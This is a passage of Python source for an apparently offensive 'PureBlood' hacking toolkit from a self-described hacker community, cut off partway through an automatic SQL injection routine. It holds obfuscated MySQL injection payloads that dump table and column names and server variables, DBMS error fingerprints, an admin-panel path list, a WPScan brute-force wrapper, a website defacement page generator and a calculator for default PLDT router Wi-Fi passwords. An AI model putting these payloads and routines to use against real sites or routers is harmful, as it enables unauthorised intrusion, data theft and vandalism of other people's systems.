My blockchain address: 1JbGADGXhL89LoTKWBrbjgSVcFEPatdVEj
Copyrights:
LinterexEvil Community 2020
MIT LICENSE
Special Mentions:
PenHackers PH
Blood Security Hackers
LinterexEvil Community
"""
import os
import sys
import platform
import time
import datetime
import re
import threading
import socket
import webbrowser
import hashlib
import random
import subprocess
import zipfile
if sys.version_info[0] == 3:
from urllib.parse import urlparse
elif sys.version_info[0] == 2:
from urlparse import urlparse
try:
import colorama
colorama.init()
except:
print ('[!] - Module (colorama) not installed!')
sys.exit()
try:
import requests
from requests.exceptions import ConnectionError
except:
print ('[!] - Module (requests) not installed!')
sys.exit()
try:
import whois
except:
print ('[!] - Module (python-whois) not installed!')
sys.exit()
try:
import dns.resolver
except:
print ('[!] - Module (dnspython) not installed!')
sys.exit()
try:
from bs4 import BeautifulSoup
except:
print ('[!] - Module (bs4) not installed!')
sys.exit()
try:
import shodan
except:
print ('[!] - Module (shodan) not installed!')
sys.exit()
#########################################################################################################################################################
# GLOBAL
FNULL = open(os.devnull, 'w')
google_hacking = 'https://www.google.com/search?q='
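# SQL-injection payloads: dios1 is a "dump in one shot" query that lists
# table/column names of the current database, and the sqli_payload_*
# strings wrap single server variables/functions in
# <strong id="PureBloodINFO"> tags so they can be scraped from the
# response HTML later on.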
dios1 = '(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(InFoRMAtiON_sCHeMa.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c7374726f6e672069643d2250757265426c6f6f64223e5461626c653a20,TaBLe_nAMe,0x203d3d20,column_name,0x3c2f7374726f6e673e3c62723e))))a)'
sqli_payload_hostname = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@hostname,0x3c2f7374726f6e673e)'
sqli_payload_tmpdir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@tmpdir,0x3c2f7374726f6e673e)'
sqli_payload_datadir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@datadir,0x3c2f7374726f6e673e)'
sqli_payload_version = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@version,0x3c2f7374726f6e673e)'
sqli_payload_basedir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@basedir,0x3c2f7374726f6e673e)'
sqli_payload_user = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,user(),0x3c2f7374726f6e673e)'
sqli_payload_database = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,database(),0x3c2f7374726f6e673e)'
sqli_payload_schema = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,schema(),0x3c2f7374726f6e673e)'
sqli_payload_uuid = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,UUID(),0x3c2f7374726f6e673e)'
sqli_payload_system_user = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,system_user(),0x3c2f7374726f6e673e)'
sqli_payload_session_user = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,session_user(),0x3c2f7374726f6e673e)'
sqli_payload_symlink = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@GLOBAL.have_symlink,0x3c2f7374726f6e673e)'
sqli_payload_ssl = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@GLOBAL.have_ssl,0x3c2f7374726f6e673e)'
sqli_dump_column_payload = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,<column>,0x3c2f7374726f6e673e)'
## Color
reset = '\033[0m'
bold = '\033[1m'
underline = '\033[4m'
### Fore
black = '\033[90m'; red = '\033[91m'; green = '\033[92m'; yellow = '\033[93m'; blue = '\033[94m'; magenta = '\033[95m'; cyan = '\033[96m'; white = '\033[97m'
### Background
bg_black = '\033[90m'; bg_red = '\033[91m'; bg_green = '\033[92m'; bg_yellow = '\033[93m'; bg_blue = '\033[94m'; bg_magenta = '\033[95m'; bg_cyan = '\033[96m'; bg_white = '\033[97m'
## Configuration
if platform.system() == 'Windows':
from ctypes import windll, create_string_buffer
h = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
if res:
try:
import struct
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
sizex = right - left + 1
sizey = bottom - top + 1
except:
print("[!] - Module (struct) not installed!")
else:
sizex, sizey = 80, 25
elif platform.system() == 'Linux' or platform.system() == 'Darwin':
sizey, sizex = os.popen('stty size', 'r').read().split()
else:
sizex = 50
## Date Time
month = datetime.date.today().strftime("%B")
if datetime.date.today().strftime("%w") == 1 or datetime.date.today().strftime("%w") == '1':
day = 'Monday'
elif datetime.date.today().strftime("%w") == 2 or datetime.date.today().strftime("%w") == '2':
day = 'Tuesday'
elif datetime.date.today().strftime("%w") == 3 or datetime.date.today().strftime("%w") == '3':
day = 'Wednesday'
elif datetime.date.today().strftime("%w") == 4 or datetime.date.today().strftime("%w") == '4':
day = 'Thursday'
elif datetime.date.today().strftime("%w") == 5 or datetime.date.today().strftime("%w") == '5':
day = 'Friday'
elif datetime.date.today().strftime("%w") == 6 or datetime.date.today().strftime("%w") == '6':
day = 'Saturday'
elif datetime.date.today().strftime("%w") == 7 or datetime.date.today().strftime("%w") == '0':
day = 'Sunday'
mday = datetime.date.today().strftime("%d")
year = datetime.date.today().strftime("%Y")
current_datetime = datetime.datetime.now()
current_time = current_datetime.strftime('%I:%M:%S')
## List
ids = [
'NONE','A','NS','MD','MF','CNAME','SOA','MB','MG','MR','NULL','WKS','PTR','HINFO','MINFO','MX','TXT','RP','AFSDB','X25','ISDN','RT','NSAP','NSAP-PTR','SIG','KEY','PX','GPOS','AAAA','LOC','NXT','SRV','NAPTR','KX','CERT','A6','DNAME','OPT','APL','DS','SSHFP','IPSECKEY','RRSIG','NSEC','DNSKEY','DHCID','NSEC3','NSEC3PARAM','TLSA','HIP','CDS','CDNSKEY','CSYNC','SPF','UNSPEC','EUI48','EUI64','TKEY','TSIG','IXFR','AXFR','MAILB','MAILA','ANY','URI','CAA','TA','DLV'
]
admin_panel_list = ['/admin.aspx','/admin.asp','/admin.php','/admin/','/administrator/','/moderator/','/webadmin/','/adminarea/','/bb-admin/','/adminLogin/','/admin_area/','/panel-administracion/','/instadmin/','/memberadmin/','/administratorlogin/','/adm/','/admin/account.php','/admin/index.php','/admin/login.php','/admin/admin.php','/admin/account.php','/joomla/administrator','/login.php','/admin_area/admin.php','/admin_area/login.php','/siteadmin/login.php','/siteadmin/index.php','/siteadmin/login.html','/admin/account.html','/admin/index.html','/admin/login.html','/admin/admin.html','/admin_area/index.php','/bb-admin/index.php','/bb-admin/login.php','/bb-admin/admin.php','/admin/home.php','/admin_area/login.html','/admin_area/index.html','/admin/controlpanel.php','/admincp/index.asp','/admincp/login.asp','/admincp/index.html','/admin/account.html','/adminpanel.html','/webadmin.html','webadmin/index.html','/webadmin/admin.html','/webadmin/login.html','/admin/admin_login.html','/admin_login.html','/panel-administracion/login.html','/admin/cp.php','cp.php','/administrator/index.php','/administrator/login.php','/nsw/admin/login.php','/webadmin/login.php','/admin/admin_login.php','/admin_login.php','/administrator/account.php','/administrator.php','/admin_area/admin.html','/pages/admin/admin-login.php','/admin/admin-login.php','/admin-login.php','/bb-admin/index.html','/bb-admin/login.html','/bb-admin/admin.html','/admin/home.html','/modelsearch/login.php','/moderator.php','/moderator/login.php','/moderator/admin.php','/account.php','/pages/admin/admin-login.html','/admin/admin-login.html','/admin-login.html','/controlpanel.php','/admincontrol.php','/admin/adminLogin.html','/adminLogin.html','/admin/adminLogin.html','/home.html','/rcjakar/admin/login.php','/adminarea/index.html','/adminarea/admin.html','/webadmin.php','/webadmin/index.php','/webadmin/admin.php','/admin/controlpanel.html','/admin.html','/admin/cp.html','cp.html','/adminpanel.php','/moderator.html','/administrator/index.html','/administrator/login.html','/user.html','/administrator/account.html','/administrator.html','/login.html','/modelsearch/login.html','/moderator/login.html','/adminarea/login.html','/panel-administracion/index.html','/panel-administracion/admin.html','/modelsearch/index.html','/modelsearch/admin.html','/admincontrol/login.html','/adm/index.html','/adm.html','/moderator/admin.html','/user.php','/account.html','/controlpanel.html','/admincontrol.html','/panel-administracion/login.php','/wp-login.php','/adminLogin.php','/admin/adminLogin.php','/home.php','/adminarea/index.php','/adminarea/admin.php','/adminarea/login.php','/panel-administracion/index.php','/panel-administracion/admin.php','/modelsearch/index.php','/modelsearch/admin.php','/admincontrol/login.php','/adm/admloginuser.php','/admloginuser.php','/admin2.php','/admin2/login.php','/admin2/index.php','adm/index.php','adm.php','affiliate.php','/adm_auth.php ','/memberadmin.php','/administratorlogin.php','/login/admin.asp','/admin/login.asp','/administratorlogin.asp','/login/asmindstrator.asp','/admin/login.aspx','/login/admin.aspx','/administartorlogin.aspx','login/administrator.aspx','/adminlogin.asp','a/dminlogin.aspx','/admin_login.asp','/admin_login.aspx','/adminhome.asp','/adminhome.aspx''/administrator_login.asp','/administrator_login.aspx']
admin_panel_valid = []
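# Regex signatures used to fingerprint the backend DBMS from error-based responses.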
dbms_errors = {
'MySQL': (r'SQL syntax.*MySQL', r'Warning.*mysql_.*', r'MySQL Query fail.*', r'SQL syntax.*MariaDB server'),
'PostgreSQL': (r'PostgreSQL.*ERROR', r'Warning.*\Wpg_.*', r'Warning.*PostgreSQL'),
'Microsoft SQL Server': (r'OLE DB.* SQL Server', r'(\W|\A)SQL Server.*Driver', r'Warning.*odbc_.*', r'Warning.*mssql_', r'Msg \d+, Level \d+, State \d+', r'Unclosed quotation mark after the character string', r'Microsoft OLE DB Provider for ODBC Drivers'),
'Microsoft Access': (r'Microsoft Access Driver', r'Access Database Engine', r'Microsoft JET Database Engine', r'.*Syntax error.*query expression'),
'Oracle': (r'\bORA-[0-9][0-9][0-9][0-9]', r'Oracle error', r'Warning.*oci_.*', 'Microsoft OLE DB Provider for Oracle'),
'IBM DB2': (r'CLI Driver.*DB2', r'DB2 SQL error'),
'SQLite': (r'SQLite/JDBCDriver', r'System.Data.SQLite.SQLiteException'),
'Informix': (r'Warning.*ibase_.*', r'com.informix.jdbc'),
'Sybase': (r'Warning.*sybase.*', r'Sybase message')
}
## Threading Object Functions
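# Each worker below is designed to run in its own threading.Thread and
# reports its result through the mutable dict/list argument it receives.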
def TCP_connect(ip, port_number, delay, output):
TCPsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TCPsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
TCPsock.settimeout(delay)
try:
TCPsock.connect((ip, port_number))
output[port_number] = 'Open'
except:
output[port_number] = ''
def dns_record_scanner(drs_hostname, ids_item, dns_record_list):
try:
answers = dns.resolver.query(drs_hostname, ids_item)
for rdata in answers:
ids_item = str(ids_item); rdata = str(rdata)
dns_record_list.append(str(ids_item + ' : ' + rdata))
except Exception:
print("The scanner Error has happened, we will continue")
pass
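# NOTE: requests.get() follows redirects by default, so the 301/302
# buckets below will rarely fill because requests reports the final
# status; pass allow_redirects=False to classify 301/302 responses directly.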
def subdomain_scanner(subdomain, so_200, so_301, so_302, so_403):
subdomain = 'http://' + subdomain
try:
subdomain_scanner_request = requests.get(subdomain)
subdomain_scanner_code = subdomain_scanner_request.status_code
if subdomain_scanner_code == 200:
so_200.append(subdomain)
elif subdomain_scanner_code == 301:
so_301.append(subdomain)
elif subdomain_scanner_code == 302:
so_302.append(subdomain)
elif subdomain_scanner_code == 403:
so_403.append(subdomain)
except ConnectionError:
print("Connection Error has happened, we will continue")
pass
def directory_scanner(ds_url_list, directory_fuzz_final1, directory_fuzz_final2, directory_fuzz_final3):
try:
directory_fuzz_request = requests.get(ds_url_list)
if directory_fuzz_request.status_code == 200:
directory_fuzz_final1.append(ds_url_list)
elif directory_fuzz_request.status_code == 301 or directory_fuzz_request.status_code == 302:
directory_fuzz_final2.append(ds_url_list)
elif directory_fuzz_request.status_code == 403:
directory_fuzz_final3.append(ds_url_list)
except:
print("Scanner Error has happened, we will continue")
pass
def file_scanner(fs_url_list, file_fuzz_final1, file_fuzz_final2, file_fuzz_final3):
try:
file_fuzz_request = requests.get(fs_url_list)
if file_fuzz_request.status_code == 200:
file_fuzz_final1.append(fs_url_list)
elif file_fuzz_request.status_code == 301 or file_fuzz_request.status_code == 302:
file_fuzz_final2.append(fs_url_list)
elif file_fuzz_request.status_code == 403:
file_fuzz_final3.append(fs_url_list)
except:
print("Scanner Issue has arised, we will continue")
pass
# END GLOBAL
#########################################################################################################################################################
class Generator:
def deface_page(self, title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups):
deface_page_template = '''
<html>
<head>
<title>--=[ Hacked By {0} ]=--</title>
<meta charset=\"UTF-8\">
<link rel=\"SHORTCUT ICON\" href=\"{1}\">
<meta name=\"Author\" content=\"LinterexCommunity | PureHackers x Blood Security Hackers\"/>
<meta name=\"copyright\" content=\"PureHackers | LinterexCommunity | Blood Security Hackers\"/>
<meta name=\"description\" content=\"{2}.\"/> <!-- Change this -->
<meta name=\"keywords\" content=\"Hacked, Pawned, Defaced, Security, PureHackers, Blood Security Hackers, PureBlood,LinterexEvilCommunity\"/> <!-- Change this -->
<meta property=\"og:title\" content=\"Hacked By {0}\"/>
<meta property=\"og:image\" content=\"{3}\"> <!-- Change this -->
<style>
{9} url(\"https://cr4shcod3.github.io/python/pureblood/pureblood.css\");
</style>
</head>
<body>
<div class=\"bg\">
<center>
<img src=\"{4}\" class=\"logo\"/> <!-- Change This -->
<h1 class=\"header glitch\" data-text=\"Hacked By {5}\">Hacked By {5}</h1><br><br>
<p class=\"message\">{6}</p>
<p class=\"message\">{7}</p><br><br>
<p class=\"groups\">Greetings: {8}</p>
</center>
</div>
</body>
</html>
'''.format(title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups, '@import')
self.deface_page_result = deface_page_template
return self.deface_page_result
def password_generator(self, length, text):
password_generator_final1 = ''
password_generator_final2 = ''
password_generator_final3 = ''
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()-_=+[{}];:\'"\|,<.>/?`~'
for i in range(length):
char_random = random.choice(chars)
password_generator_final1 += char_random
password_generator_final2 = hashlib.md5(text.encode('utf-8')).hexdigest()
l33t_alphabet = ['4','8','(','|)','3','|=','9','#','1','_|','|<','|_','|\/|','|\|','0','|D','(,)','|2','$','7','|_|','\/','\/\/','><','\'/','(/)']
# Map each letter to its leet equivalent in a single pass so that
# characters produced by one substitution are never substituted again.
l33t_map = dict(zip('abcdefghijklmnopqrstuvwxyz', l33t_alphabet))
password_generator_final3 = ''.join(l33t_map.get(ch.lower(), ch) for ch in text)
self.password_generator_result1 = password_generator_final1
self.password_generator_result2 = password_generator_final2
self.password_generator_result3 = password_generator_final3
return self.password_generator_result1, self.password_generator_result2, self.password_generator_result3
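# Candidate default-password patterns for PLDT home routers, built from
# the 5-character digit/MAC fragments supplied by the caller.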
def pldt_password_calculator(self, digit5, mac5):
pldt_password_calculator_final1 = ['PLDTWIFI' + digit5, 'pldtwifi'+ digit5]
pldt_password_calculator_final2_multiply = digit5 * 3
pldt_password_calculator_final2 = ['PLDTWIFI' + pldt_password_calculator_final2_multiply, 'pldtwifi' + pldt_password_calculator_final2_multiply]
digit55 = digit5
# Swap every hex nibble with its bitwise complement in a single pass
# (0<->f, 1<->e, 2<->d, 3<->c, 4<->b, 5<->a, 6<->9, 7<->8).
nibble_swap = dict(zip('0123456789abcdef', 'fedcba9876543210'))
digit55 = ''.join(nibble_swap.get(ch, ch) for ch in digit55)
pldt_password_calculator_final3 = 'wlan' + digit55
pldt_password_calculator_final4 = ['PLDTWIFI' + digit55, 'pldtwifi' + digit55]
pldt_password_calculator_final5 = 'HomeBro_' + mac5
self.pldt_password_calculator_result1 = pldt_password_calculator_final1
self.pldt_password_calculator_result2 = pldt_password_calculator_final2
self.pldt_password_calculator_result3 = pldt_password_calculator_final3
self.pldt_password_calculator_result4 = pldt_password_calculator_final4
self.pldt_password_calculator_result5 = pldt_password_calculator_final5
return self.pldt_password_calculator_result1, self.pldt_password_calculator_result2, self.pldt_password_calculator_result3, self.pldt_password_calculator_result4, self.pldt_password_calculator_result5
def text_to_hash(self, text):
md5_final = hashlib.md5(text.encode('utf-8')).hexdigest()
sha1_final = hashlib.sha1(text.encode('utf-8')).hexdigest()
sha224_final = hashlib.sha224(text.encode('utf-8')).hexdigest()
sha256_final = hashlib.sha256(text.encode('utf-8')).hexdigest()
sha384_final = hashlib.sha384(text.encode('utf-8')).hexdigest()
sha512_final = hashlib.sha512(text.encode('utf-8')).hexdigest()
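# md4, ripemd160 and whirlpool are not guaranteed hashlib members; they
# are only available when the linked OpenSSL build provides them, and
# hashlib.new() raises ValueError otherwise.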
md4 = hashlib.new('md4')
md4.update(text.encode('utf-8'))
md4_final = md4.hexdigest()
ripemd160 = hashlib.new('ripemd160')
ripemd160.update(text.encode('utf-8'))
ripemd160_final = ripemd160.hexdigest()
whirlpool = hashlib.new('whirlpool')
whirlpool.update(text.encode('utf-8'))
whirlpool_final = whirlpool.hexdigest()
text_to_hash_final = """
Text To Hash Result:
[+] MD4: {0}
[+] MD5: {1}
[+] SHA1: {2}
[+] SHA224: {3}
[+] SHA256: {4}
[+] SHA384: {5}
[+] SHA512: {6}
[+] RipeMD160: {7}
[+] Whirlpool: {8}
""".format(md4_final, md5_final, sha1_final, sha224_final, sha256_final, sha384_final, sha512_final, ripemd160_final, whirlpool_final)
self.text_to_hash_result = text_to_hash_final
return self.text_to_hash_result
class WebApplicationAttack:
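# Thin wrappers around the external WPScan tool: check/bootstrap the
# ruby + wpscan installation (cloning into external/ on Windows), then
# shell out with enumeration or brute-force options.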
def wp_scan(self, url):
wp_scan_test_ruby_command = subprocess.call('ruby -v', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_test_ruby_command == 0:
pass
else:
print ('\n{2}[{1}!{2}] {3}- {1}Please install ruby first!{0}'.format(reset, red, blue, yellow))
print ('Ruby Installer: https://rubyinstaller.org/')
time.sleep(2)
print ('')
web_application_attack()
if platform.system() == 'Windows':
if not os.path.exists('external/wpscan-master'):
wp_scan_download_curl = subprocess.call('curl -LO https://github.com/wpscanteam/wpscan/archive/master.zip', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_download_curl == 0:
wp_scan_unzip = zipfile.ZipFile('master.zip', 'r')
wp_scan_unzip.extractall('external/')
wp_scan_unzip.close()
os.remove('master.zip')
elif wp_scan_download_curl == 1:
if os.path.exists('external/wpscan'):
os.rename('external/wpscan', 'external/wpscan-master')
else:
wp_scan_download_git = subprocess.call('cd external/ && git clone https://github.com/wpscanteam/wpscan', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_download_git == 0:
os.rename('external/wpscan', 'external/wpscan-master')
elif wp_scan_download_git == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install curl or git for windows first!{0}'.format(reset, red, blue, yellow))
print ('Tutorial: http://www.oracle.com/webfolder/technetwork/tutorials/obe/cloud/objectstorage/restrict_rw_accs_cntainers_REST_API/files/installing_curl_command_line_tool_on_windows.html')
time.sleep(2)
print ('')
web_application_attack()
else:
pass
wp_scan = subprocess.call('ruby external/wpscan-master/wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan != 0:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
else:
pass
else:
wp_scan = subprocess.call('wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan != 0:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
else:
pass
if wp_scan == 0:
pass
elif wp_scan == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
if platform.system() == 'Windows':
print ('[#] - Updating WPScan:')
subprocess.call('ruby external/wpscan-master/wpscan --batch --no-banner --no-color --update --disable-tls-checks', shell=True)
print ('\n[#] - Running WPScan:')
if sys.version_info[0] == 3:
wp_scan_user_range = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red)))
elif sys.version_info[0] == 2:
wp_scan_user_range = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red)))
try:
subprocess.call('ruby external/wpscan-master/wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 -e u['+wp_scan_user_range+'],p,tt', shell=True)
except Exception as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
print ('')
web_application_attack()
else:
print ('[#] - Updating WPScan:')
subprocess.call('wpscan --batch --no-banner --update --disable-tls-checks', shell=True)
print ('\n[#] - Running WPScan:')
if sys.version_info[0] == 3:
wp_scan_user_range = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red)))
elif sys.version_info[0] == 2:
wp_scan_user_range = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red)))
try:
subprocess.call('wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 -e u['+wp_scan_user_range+'],p,tt', shell=True)
except Exception as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
print ('')
web_application_attack()
def wp_scan_bruteforce(self, url):
wp_scan_test_ruby_command = subprocess.call('ruby -v', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_test_ruby_command == 0:
pass
else:
print ('\n{2}[{1}!{2}] {3}- {1}Please install ruby first!{0}'.format(reset, red, blue, yellow))
print ('Ruby Installer: https://rubyinstaller.org/')
time.sleep(2)
print ('')
web_application_attack()
if platform.system() == 'Windows':
if not os.path.exists('external/wpscan-master'):
wp_scan_download_curl = subprocess.call('curl -LO https://github.com/wpscanteam/wpscan/archive/master.zip', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_download_curl == 0:
wp_scan_unzip = zipfile.ZipFile('master.zip', 'r')
wp_scan_unzip.extractall('external/')
wp_scan_unzip.close()
os.remove('master.zip')
elif wp_scan_download_curl == 1:
if os.path.exists('external/wpscan'):
os.rename('external/wpscan', 'external/wpscan-master')
else:
wp_scan_download_git = subprocess.call('cd external/ && git clone https://github.com/wpscanteam/wpscan', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_download_git == 0:
os.rename('external/wpscan', 'external/wpscan-master')
elif wp_scan_download_git == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install curl or git for windows first!{0}'.format(reset, red, blue, yellow))
print ('Tutorial: http://www.oracle.com/webfolder/technetwork/tutorials/obe/cloud/objectstorage/restrict_rw_accs_cntainers_REST_API/files/installing_curl_command_line_tool_on_windows.html')
time.sleep(2)
print ('')
web_application_attack()
else:
pass
wp_scan = subprocess.call('ruby external/wpscan-master/wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan != 0:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
else:
pass
else:
wp_scan = subprocess.call('wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan != 0:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
else:
pass
if wp_scan == 0:
pass
elif wp_scan == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
if platform.system() == 'Windows':
print ('[#] - Updating WPScan:')
subprocess.call('ruby external/wpscan-master/wpscan --batch --no-banner --no-color --update --disable-tls-checks', shell=True)
print ('\n[#] - Running WPScan:')
if sys.version_info[0] == 3:
wp_scan_brutefoce_username = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red)))
wp_scan_bruteforce_password = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red)))
elif sys.version_info[0] == 2:
wp_scan_brutefoce_username = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red)))
wp_scan_bruteforce_password = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red)))
try:
subprocess.call('ruby external/wpscan-master/wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 --wordlist '+wp_scan_bruteforce_password+' --username '+wp_scan_brutefoce_username, shell=True)
except Exception as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
print ('')
web_application_attack()
else:
print ('[#] - Updating WPScan:')
subprocess.call('wpscan --batch --no-banner --update --disable-tls-checks', shell=True)
print ('\n[#] - Running WPScan:')
if sys.version_info[0] == 3:
wp_scan_brutefoce_username = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red)))
wp_scan_bruteforce_password = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red)))
elif sys.version_info[0] == 2:
wp_scan_brutefoce_username = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red)))
wp_scan_bruteforce_password = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red)))
try:
subprocess.call('wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 --wordlist '+wp_scan_bruteforce_password+' --username '+wp_scan_brutefoce_username, shell=True)
except Exception as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
print ('')
web_application_attack()
print (reset)
print ('{0}='.format(red) * int(sizex))
web_application_attack()
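# Error/UNION-based SQL injection helper: fingerprint the DBMS from error
# strings, count columns with ORDER BY, find a reflected column, read
# server variables via the payloads defined above, then dump the
# table/columns chosen interactively by the user.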
def auto_sql_injection(self, url):
print ('[#] - Auto SQL Injection Running on -> {0}'.format(url))
auto_sql_injection_request_origin = requests.get(url)
auto_sql_injection_request_origin_html = BeautifulSoup(auto_sql_injection_request_origin.text, 'html.parser')
auto_sql_injection_request_origin_html_h1 = auto_sql_injection_request_origin_html.find_all('h1')
auto_sql_injection_request_origin_html_h2 = auto_sql_injection_request_origin_html.find_all('h2')
auto_sql_injection_request_origin_html_h3 = auto_sql_injection_request_origin_html.find_all('h3')
auto_sql_injection_request_origin_html_p = auto_sql_injection_request_origin_html.find_all('p')
print ('[~] - Checking If Vulnerable')
auto_sql_injection_request = requests.get('{0}\''.format(url))
auto_sql_injection_request_url = '{0}\''.format(url)
auto_sql_injection_request_result = ''
auto_sql_injection_request_i = ''
if auto_sql_injection_request.status_code == 200:
for db, errors in dbms_errors.items():
for error in errors:
